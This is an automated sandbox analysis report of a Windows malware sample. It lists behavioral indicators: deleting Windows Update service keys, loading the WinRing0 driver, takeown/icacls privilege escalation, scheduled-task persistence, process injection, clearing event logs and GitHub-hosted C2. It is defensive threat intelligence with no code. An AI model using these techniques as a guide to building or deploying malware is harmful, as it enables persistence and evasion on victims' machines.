Malware Analysis Report

2024-11-16 12:52

Sample ID 240814-w1cc8a1glp
Target 40eeb7e6dc706f7e0eac78cc85213220N.exe
SHA256 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
Tags
defense_evasion discovery evasion execution exploit persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548

Threat Level: Known bad

The file 40eeb7e6dc706f7e0eac78cc85213220N.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit persistence

Modifies security service

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Possible privilege escalation attempt

Sets service image path in registry

Loads dropped DLL

Checks computer location settings

Indicator Removal: Clear Windows Event Logs

Executes dropped EXE

Modifies file permissions

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Power Settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Modifies registry key

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-14 18:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-14 18:22

Reported

2024-08-14 18:25

Platform

win7-20240704-en

Max time kernel

120s

Max time network

125s

Command Line

winlogon.exe

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 952 created 408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1344 created 408 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" C:\Windows\system32\services.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskeng.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00508b0a77eeda01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\system32\services.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Google\Chrome\updater.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
